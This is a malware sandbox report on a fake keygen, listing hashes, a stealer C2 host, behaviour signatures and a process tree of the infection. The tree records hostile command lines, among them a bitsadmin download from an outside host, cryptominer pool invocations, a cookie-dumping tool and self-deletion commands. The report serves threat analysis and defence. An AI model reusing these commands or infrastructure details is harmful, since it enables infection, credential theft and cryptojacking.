Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-04-2021 05:25

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 59 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2724
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2712
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2604
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2380
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2368
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1924
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1380
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1368
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1164
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1112
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:344
                    • C:\Users\Admin\AppData\Roaming\gtvjbvb
                      C:\Users\Admin\AppData\Roaming\gtvjbvb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4176
                      • C:\Users\Admin\AppData\Roaming\gtvjbvb
                        C:\Users\Admin\AppData\Roaming\gtvjbvb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3288
                    • C:\Users\Admin\AppData\Roaming\jvvjbvb
                      C:\Users\Admin\AppData\Roaming\jvvjbvb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:636
                    • C:\Users\Admin\AppData\Roaming\gtvjbvb
                      C:\Users\Admin\AppData\Roaming\gtvjbvb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2848
                      • C:\Users\Admin\AppData\Roaming\gtvjbvb
                        C:\Users\Admin\AppData\Roaming\gtvjbvb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:364
                    • C:\Users\Admin\AppData\Roaming\jvvjbvb
                      C:\Users\Admin\AppData\Roaming\jvvjbvb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4560
                    • C:\Users\Admin\AppData\Roaming\gtvjbvb
                      C:\Users\Admin\AppData\Roaming\gtvjbvb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5376
                      • C:\Users\Admin\AppData\Roaming\gtvjbvb
                        C:\Users\Admin\AppData\Roaming\gtvjbvb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5992
                    • C:\Users\Admin\AppData\Roaming\jvvjbvb
                      C:\Users\Admin\AppData\Roaming\jvvjbvb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:996
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3516
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:196
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3836
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1844
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4456
                        • C:\Users\Admin\AppData\Local\Temp\is-VAUCD.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-VAUCD.tmp\Install.tmp" /SL5="$601AA,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4488
                          • C:\Users\Admin\AppData\Local\Temp\is-9E6MV.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-9E6MV.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4572
                            • C:\Program Files\7-Zip\FBZGESWPRT\ultramediaburner.exe
                              "C:\Program Files\7-Zip\FBZGESWPRT\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4764
                              • C:\Users\Admin\AppData\Local\Temp\is-FNCPH.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-FNCPH.tmp\ultramediaburner.tmp" /SL5="$701D6,281924,62464,C:\Program Files\7-Zip\FBZGESWPRT\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4796
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4840
                            • C:\Users\Admin\AppData\Local\Temp\c9-a1194-3d6-8bab5-e2ea86e337cfc\SHyjusaeqere.exe
                              "C:\Users\Admin\AppData\Local\Temp\c9-a1194-3d6-8bab5-e2ea86e337cfc\SHyjusaeqere.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4876
                            • C:\Users\Admin\AppData\Local\Temp\67-0e47b-4ab-c80a9-db6a4d400dda6\Wezhulyrybae.exe
                              "C:\Users\Admin\AppData\Local\Temp\67-0e47b-4ab-c80a9-db6a4d400dda6\Wezhulyrybae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4920
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22bsdxzq.pjf\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4644
                                • C:\Users\Admin\AppData\Local\Temp\22bsdxzq.pjf\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\22bsdxzq.pjf\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4616
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h5yvzwqy.uj5\google-game.exe & exit
                                6⤵
                                  PID:4140
                                  • C:\Users\Admin\AppData\Local\Temp\h5yvzwqy.uj5\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\h5yvzwqy.uj5\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4968
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      PID:5276
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obejsznt.ztq\md1_1eaf.exe & exit
                                  6⤵
                                    PID:5164
                                    • C:\Users\Admin\AppData\Local\Temp\obejsznt.ztq\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\obejsznt.ztq\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5760
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0rkidjnm.0ra\y1.exe & exit
                                    6⤵
                                      PID:5728
                                      • C:\Users\Admin\AppData\Local\Temp\0rkidjnm.0ra\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\0rkidjnm.0ra\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:5852
                                        • C:\Users\Admin\AppData\Local\Temp\w1MBPUj98K.exe
                                          "C:\Users\Admin\AppData\Local\Temp\w1MBPUj98K.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5536
                                          • C:\Users\Admin\AppData\Roaming\1619414577894.exe
                                            "C:\Users\Admin\AppData\Roaming\1619414577894.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619414577894.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:3952
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\w1MBPUj98K.exe"
                                            9⤵
                                              PID:5420
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:4428
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\0rkidjnm.0ra\y1.exe"
                                            8⤵
                                              PID:5052
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:964
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0g41uitm.tpk\askinstall39.exe & exit
                                          6⤵
                                            PID:5952
                                            • C:\Users\Admin\AppData\Local\Temp\0g41uitm.tpk\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\0g41uitm.tpk\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of WriteProcessMemory
                                              PID:4856
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:5712
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:3400
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\51xkm1zk.gm0\inst.exe & exit
                                              6⤵
                                                PID:4612
                                                • C:\Users\Admin\AppData\Local\Temp\51xkm1zk.gm0\inst.exe
                                                  C:\Users\Admin\AppData\Local\Temp\51xkm1zk.gm0\inst.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5656
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hjt20xsw.1ub\SunLabsPlayer.exe /S & exit
                                                6⤵
                                                  PID:2236
                                                  • C:\Users\Admin\AppData\Local\Temp\hjt20xsw.1ub\SunLabsPlayer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\hjt20xsw.1ub\SunLabsPlayer.exe /S
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:6032
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5668
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2076
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:1820
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:4752
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:788
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2280
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:4252
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Drops file in Windows directory
                                                                  • Download via BitsAdmin
                                                                  • Modifies Internet Explorer settings
                                                                  • Modifies registry class
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:4412
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pkMJyZMVh3DzPhiu -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:5480
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -puf2MfOCmKMwnJRv -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:4556
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5144
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:1552
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:2472
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5920
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5856
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:1844
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in System32 directory
                                                                              PID:2228
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                            8⤵
                                                                            • Drops file in Program Files directory
                                                                            PID:2088
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5240
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4784
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:900
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqAEB6.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5056
                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:4772
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\15cerinn.xbn\GcleanerWW.exe /mixone & exit
                                                                                6⤵
                                                                                  PID:5580
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evfb2jeb.3eu\toolspab1.exe & exit
                                                                                  6⤵
                                                                                    PID:4144
                                                                                    • C:\Users\Admin\AppData\Local\Temp\evfb2jeb.3eu\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\evfb2jeb.3eu\toolspab1.exe
                                                                                      7⤵
                                                                                        PID:5416
                                                                                        • C:\Users\Admin\AppData\Local\Temp\evfb2jeb.3eu\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\evfb2jeb.3eu\toolspab1.exe
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2340
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdktq5dh.se4\c7ae36fa.exe & exit
                                                                                      6⤵
                                                                                        PID:4604
                                                                                        • C:\Users\Admin\AppData\Local\Temp\bdktq5dh.se4\c7ae36fa.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\bdktq5dh.se4\c7ae36fa.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5228
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0otvqqs.2zs\app.exe /8-2222 & exit
                                                                                        6⤵
                                                                                          PID:4836
                                                                                          • C:\Users\Admin\AppData\Local\Temp\d0otvqqs.2zs\app.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\d0otvqqs.2zs\app.exe /8-2222
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5492
                                                                                            • C:\Users\Admin\AppData\Local\Temp\d0otvqqs.2zs\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\d0otvqqs.2zs\app.exe" /8-2222
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:5824
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:5020
                                                                                  • C:\Users\Admin\AppData\Roaming\75B2.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\75B2.tmp.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:504
                                                                                    • C:\Users\Admin\AppData\Roaming\75B2.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\75B2.tmp.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks processor information in registry
                                                                                      PID:5412
                                                                                  • C:\Users\Admin\AppData\Roaming\78B1.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\78B1.tmp.exe"
                                                                                    3⤵
                                                                                      PID:4856
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w30044@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                        4⤵
                                                                                          PID:4688
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w11390 --cpu-max-threads-hint 50 -r 9999
                                                                                          4⤵
                                                                                          • Blocklisted process makes network request
                                                                                          PID:5128
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        3⤵
                                                                                          PID:4740
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:5344
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        PID:5180
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:2404
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5232
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5876
